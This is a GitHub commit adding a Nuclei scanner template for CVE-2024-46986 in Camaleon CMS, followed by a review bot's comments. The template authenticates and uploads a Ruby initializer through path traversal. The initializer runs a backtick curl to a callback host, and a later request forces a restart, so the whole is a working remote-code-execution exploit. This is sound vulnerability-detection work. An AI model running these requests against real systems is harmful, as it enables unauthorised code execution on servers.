Merge pull request #10843 from projectdiscovery/CVE-2024-46986

Create CVE-2024-46986.yaml
patch-12
Ritik Chaddha 2024-09-30 12:05:42 +04:00 committed by GitHub
commit 757058f83e
1 changed files with 128 additions and 0 deletions


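--- /dev/null
+++ b/CVE-2024-46986.yaml
@@ -0,0 +1,128 @@
+id: CVE-2024-46986
+info:
+name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
+author: iamnoooob,rootxharsh,pdresearch
+severity: critical
+description: |
+An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
+reference:
+- https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
+- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
+- https://owasp.org/www-community/attacks/Path_Traversal
+- https://github.com/nomi-sec/PoC-in-GitHub
+- https://github.com/fkie-cad/nvd-json-data-feeds
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+cvss-score: 9.9
+cve-id: CVE-2024-46986
+cwe-id: CWE-22,CWE-74
+epss-score: 0.0009
+epss-percentile: 0.39015
+cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
+metadata:
+max-request: 4
+verified: true
+vendor: tuzitio
+product: camaleon_cms
+shodan-query: title:"Camaleon CMS"
+fofa-query: title="Camaleon CMS"
+tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated
+variables:
+username: "{{username}}"
+password: "{{password}}"
+filename: "{{to_lower(rand_text_alpha(12))}}"
+flow: http(1) && http(2) && http(3) && http(4)
+http:
+- raw:
+- |
+GET /admin/login HTTP/1.1
+Host: {{Hostname}}
+extractors:
+- type: regex
+part: body
+internal: true
+name: nonce
+group: 1
+regex:
+- 'name="authenticity_token" value="(.*?)"'
+- raw:
+- |
+POST /admin/login HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+Connection: keep-alive
+authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}
+matchers:
+- type: dsl
+dsl:
+- 'contains(location,"/admin/dashboard")'
+internal: true
+- raw:
+- |
+POST /admin/media/upload?actions=false HTTP/1.1
+Host: {{Hostname}}
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
+------WebKitFormBoundarynJs8ffRP2MgQXiF8
+Content-Disposition: form-data; name="file_upload"; filename="{(unknown)}.rb"
+Content-Type: text/x-ruby-script
+`curl {{interactsh-url}}`
+------WebKitFormBoundarynJs8ffRP2MgQXiF8
+Content-Disposition: form-data; name="folder"
+../../../config/initializers/
+------WebKitFormBoundarynJs8ffRP2MgQXiF8
+Content-Disposition: form-data; name="skip_auto_crop"
+true
+------WebKitFormBoundarynJs8ffRP2MgQXiF8--
+matchers:
+- type: word
+part: body
+words:
+- '{"name":"{(unknown)}.rb","folder_path":"../../../config/initializers"'
+internal: true
+- raw:
+- |
+POST /admin/media/upload?actions=false HTTP/1.1
+Host: {{Hostname}}
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
+------WebKitFormBoundarynJs8ffRP2MgQXiF8
+Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
+Content-Type: text/x-ruby-script
+{{randstr}}
+------WebKitFormBoundarynJs8ffRP2MgQXiF8
+Content-Disposition: form-data; name="folder"
+../../../tmp/
+------WebKitFormBoundarynJs8ffRP2MgQXiF8
+Content-Disposition: form-data; name="skip_auto_crop"
+true
+------WebKitFormBoundarynJs8ffRP2MgQXiF8--
+matchers-condition: and
+matchers:
+- type: word
+part: interactsh_protocol
+words:
+- dns
+- type: word
+part: body
+words:
+- '{"name":"restart.txt","folder_path":"../../../tmp"'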
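Review bot: The Ruby file dropped by the third request is a bare backtick call, `` `curl {{interactsh-url}}` ``, and because it lands in config/initializers/ it is executed on every application boot; if curl is not installed on the target, Ruby raises Errno::ENOENT from the backtick, the initializer aborts the boot, and since the fourth request then touches tmp/restart.txt (presumably to force a Passenger-style restart) the scan can leave the application down rather than merely beaconing. A guarded one-liner keeps the callback and makes the initializer harmless on failure: `` begin; `curl {{interactsh-url}}`; rescue StandardError; end `` (a pure-Ruby lookup such as `Resolv.getaddress` would also drop the curl dependency while still satisfying the `dns` interactsh matcher). The template never removes the initializer it wrote, so the `intrusive` tag alone understates the footprint; a sentence in `description` such as `Note: the initializer written to config/initializers/ persists and runs on every boot; delete it manually after testing` would tell operators what to clean up. Separately, the `{(unknown)}.rb` in the upload filename and in the third request's body matcher looks like a rendering artifact of the `filename` variable declared under `variables:`; worth confirming the committed file references `{{filename}}` in both places.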